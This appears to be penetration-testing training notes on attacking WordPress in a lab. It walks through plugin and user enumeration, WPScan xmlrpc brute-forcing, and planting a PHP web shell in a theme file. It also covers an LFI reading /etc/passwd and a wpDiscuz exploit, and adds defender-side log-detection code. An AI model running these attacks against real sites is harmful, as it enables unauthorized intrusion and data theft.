Content Management Systems (CMS)

WordPress - Discovery & Enumeration

Search for robots.txt or try accessing /wp-admin or /wp-login.php.

WordPress stores its plugins in the wp-content/plugins directory. This folder is helpful to enumerate vulnerable plugins. Themes are stored in the wp-content/themes directory. These files should be carefully enumerated as they may lead to RCE.

There are five types of users on a standard WordPress installation.

  1. Administrator: This user has access to administrative features within the website. This includes adding and deleting users and posts, as well as editing source code.

  2. Editor: An editor can publish and manage posts, including the posts of other users.

  3. Author: They can publish and manage their own posts.

  4. Contributor: These users can write and manage their own posts but cannot publish them.

  5. Subscriber: These are standard users who can browse posts and edit their profiles.

Getting access to an administrator is usually sufficient to obtain code execution on the server. Editors and authors might have access to certain vulnerable plugins, which normal users don’t.

Enumeration

curl -s http://blog.inlanefreight.local | grep WordPress

<meta name="generator" content="WordPress 5.8" />

curl -s http://blog.inlanefreight.local/ | grep themes

<link rel='stylesheet' id='bootstrap-css'  href='http://blog.inlanefreight.local/wp-content/themes/business-gravity/assets/vendors/bootstrap/css/bootstrap.min.css' type='text/css' media='all' />

curl -s http://blog.inlanefreight.local/ | grep plugins

From the output above, we know that the Contact Form 7 and mail-masta plugins are installed. The next step would be enumerating the versions.

Browsing to http://blog.inlanefreight.local/wp-content/plugins/mail-masta/ shows us that directory listing is enabled and that a readme.txt file is present. These files are very often helpful in fingerprinting version numbers.

Enumerating Users

A valid username combined with an invalid password results in the following message:

However, an invalid username returns that the user was not found.

This makes WordPress vulnerable to username enumeration, which can be used to obtain a list of potential usernames.

WPScan

WPScan is an automated WordPress scanner and enumeration tool. It determines if the various themes and plugins used by a blog are outdated or vulnerable. It’s installed by default on Parrot OS but can also be installed manually with gem.

sudo gem install wpscan

WPScan is also able to pull in vulnerability information from external sources. We can obtain an API token from WPVulnDB, which WPScan uses to look up PoCs and vulnerability reports for the components it finds. The free plan allows up to 75 requests per day. To use the WPVulnDB database, just create an account and copy the API token from the users page. This token can then be supplied to wpscan using the --api-token parameter.

The --enumerate flag is used to enumerate various components of the WordPress application, such as plugins, themes, and users. By default, WPScan enumerates vulnerable plugins, themes, users, media, and backups. However, specific arguments can be supplied to restrict enumeration to specific components.

For example, all plugins can be enumerated using the arguments --enumerate ap.

sudo wpscan --url http://blog.inlanefreight.local --enumerate --api-token dEOFB<SNIP>

Attacking WordPress

There are several ways we can abuse built-in functionality to attack a WordPress installation. We will cover login brute forcing against the wp-login.php page and remote code execution via the theme editor. These two tactics build on each other, as we first need to obtain valid credentials for an administrator-level user to log in to the WordPress back-end and edit a theme.

Login Bruteforce

WPScan can be used to brute force usernames and passwords. The scan report in the previous section returned two users registered on the website (admin and john). The tool supports two kinds of login brute force attacks, xmlrpc and wp-login. The wp-login method attempts to brute force the standard WordPress login page, while the xmlrpc method uses the WordPress API to make login attempts through /xmlrpc.php. The xmlrpc method is preferred as it is faster.

sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local

The --password-attack flag is used to supply the type of attack. The -U argument takes in a list of users or a file containing user names. This applies to the -P passwords option as well. The -t flag sets the number of threads, which we can adjust up or down as needed.

Code Execution

With administrative access to WordPress, we can modify the PHP source code to execute system commands.

After login, click on Appearance in the side panel and select Theme Editor. This page lets us edit the PHP source code directly.

An inactive theme can be selected to avoid corrupting the primary theme.

Click on Select after selecting the theme, and we can edit an uncommon page such as 404.php to add a web shell.

system($_GET[0]);

The code above should let us execute commands via the GET parameter 0. We add this single line to the file just below the comments to avoid too much modification of the contents.

Click on Update File at the bottom to save. We know that WordPress themes are located at /wp-content/themes/<theme name>. We can interact with the web shell via the browser or using cURL. As always, we can then utilize this access to gain an interactive reverse shell and begin exploring the target.

curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id
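As an added defender-side example (not part of the original notes), the following Python checks a constructed set of Apache access-log lines for the two activities described above: repeated POSTs to xmlrpc.php or wp-login.php from one source, and direct requests to a theme PHP file carrying the 0= parameter of the 404.php shell above or the cmd= parameter of the wpDiscuz shell later on this page. The sample log lines, the threshold and the parameter list are assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs

# Constructed sample of Apache combined-format access-log lines (not from the original page).
SAMPLE_LOG = """\
203.0.113.7 - - [25/Aug/2021:14:02:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 431 "-" "WPScan v3.8.18"
203.0.113.7 - - [25/Aug/2021:14:02:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 431 "-" "WPScan v3.8.18"
203.0.113.7 - - [25/Aug/2021:14:02:02 +0000] "POST /wp-login.php HTTP/1.1" 200 2891 "-" "WPScan v3.8.18"
198.51.100.9 - - [25/Aug/2021:14:05:10 +0000] "GET /wp-content/themes/twentynineteen/404.php?0=id HTTP/1.1" 200 52 "-" "curl/7.74.0"
192.0.2.33 - - [25/Aug/2021:14:06:00 +0000] "GET /?p=1 HTTP/1.1" 200 15321 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
LOGIN_ENDPOINTS = {"/xmlrpc.php", "/wp-login.php"}  # both brute-force paths WPScan targets
THEME_PHP_RE = re.compile(r"^/wp-content/themes/[^/]+/.*\.php$")
SHELL_PARAMS = {"cmd", "0"}  # assumed: GET parameter names read by the web shells on this page

def parse_line(line):
    """Split one access-log line into ip, method, url path, query string and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["url"], _, e["query"] = e["path"].partition("?")
    return e

def detect_login_bursts(lines, threshold=3):
    """Report source IPs with at least `threshold` POSTs to xmlrpc.php or wp-login.php."""
    counts = Counter()
    for line in lines:
        e = parse_line(line)
        if e and e["method"] == "POST" and e["url"] in LOGIN_ENDPOINTS:
            counts[e["ip"]] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}

def detect_theme_shell_hits(lines):
    """Report direct requests to theme PHP files with a command-style parameter; templates are normally rendered through index.php, not fetched by path."""
    hits = []
    for line in lines:
        e = parse_line(line)
        if not e or not THEME_PHP_RE.match(e["url"]):
            continue
        if SHELL_PARAMS & set(parse_qs(e["query"], keep_blank_values=True)):
            hits.append((e["ip"], e["path"]))
    return hits

if __name__ == "__main__":
    print(detect_login_bursts(SAMPLE_LOG.splitlines()), detect_theme_shell_hits(SAMPLE_LOG.splitlines()))
```

On the server side, defining DISALLOW_FILE_EDIT as true in wp-config.php removes the theme and plugin editors from the dashboard, so the 404.php modification described above cannot be made through that route.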

The wp_admin_shell_upload module from Metasploit can be used to upload a shell and execute it automatically.

use exploit/unix/webapp/wp_admin_shell_upload

Many Metasploit modules (and other tools) attempt to clean up after themselves, but some fail. During an assessment, we would want to make every attempt to clean up this artifact from the client system and, regardless of whether we were able to remove it or not, we should list this artifact in our report appendices. At the very least, our report should have an appendix section that lists the following information:

  • Exploited systems (hostname/IP and method of exploitation)

  • Compromised users (account name, method of compromise, account type (local or domain))

  • Artifacts created on systems

  • Changes (such as adding a local admin user or modifying group membership)

Leveraging Known Vulnerabilities

We can use the waybackurls tool to look for older versions of a target site using the Wayback Machine. Sometimes we may find a previous version of a WordPress site using a plugin that has a known vulnerability. If the plugin is no longer in use but the developers did not remove it properly, we may still be able to access the directory it is stored in and exploit a flaw.

Vulnerable Plugins - mail-masta

Since 2016, the plugin has been affected by an unauthenticated SQL injection and a Local File Inclusion (LFI) vulnerability.

curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

Vulnerable Plugins - wpDiscuz

Based on the version number (7.0.4), this exploit has a pretty good shot of getting us command execution.

The exploit script takes two parameters: -u the URL and -p the path to a valid post.

python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1

The exploit as written may fail, but we can use cURL to execute commands using the uploaded web shell. We just need to append ?cmd= after the .php extension to run commands, as we can see in the exploit script.

curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id

In this example, we would want to make sure to clean up the uthsdkbywoxeebg-1629904090.8191.php file and once again list it as a testing artifact in the appendices of our report.
